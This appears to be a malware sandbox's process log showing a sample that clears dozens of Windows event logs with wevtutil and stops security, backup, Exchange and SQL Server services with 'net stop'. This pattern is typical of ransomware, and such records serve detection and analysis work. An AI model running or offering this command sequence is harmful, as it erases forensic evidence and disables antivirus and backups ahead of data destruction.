C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Informational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audit/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Backup"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CDROM/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Call"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Logging"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXP/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"4⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"4⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfemms"3⤵
-
C:\Windows\system32\net.exenet stop "mfemms"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfemms"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mfevtp"3⤵
-
C:\Windows\system32\net.exenet stop "mfevtp"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mfevtp"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MMS"3⤵
-
C:\Windows\system32\net.exenet stop "MMS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MMS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "mozyprobackup"3⤵
-
C:\Windows\system32\net.exenet stop "mozyprobackup"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "mozyprobackup"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer"3⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer100"3⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer100"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer100"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MsDtsServer110"3⤵
-
C:\Windows\system32\net.exenet stop "MsDtsServer110"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MsDtsServer110"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeES"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeES"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeES"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeIS"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeIS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeIS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMGMT"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeMGMT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMGMT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeMTA"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeMTA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeMTA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSA"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeSA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSExchangeSRS"3⤵
-
C:\Windows\system32\net.exenet stop "MSExchangeSRS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSExchangeSRS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSOLAP$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "MSOLAP$TPSAMA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSOLAP$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$BKUPEXEC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$BKUPEXEC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$BKUPEXEC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$ECWDB2"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$ECWDB2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$ECWDB2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTICEMGT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTICEMGT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PRACTTICEBGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PRACTTICEBGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PROFXENGAGEMENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SBSMONITORING"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SBSMONITORING"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SHAREPOINT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SHAREPOINT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SHAREPOINT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPS"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$TPS"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPS"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$TPSAMA"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$TPSAMA"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$TPSAMA"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2012"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$PROFXENGAGEMENT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SBSMONITORING"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SHAREPOINT"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SQL_2008"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net.exenet stop "MSSQLFDLauncher$SYSTEM_BGC"4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"5⤵
-
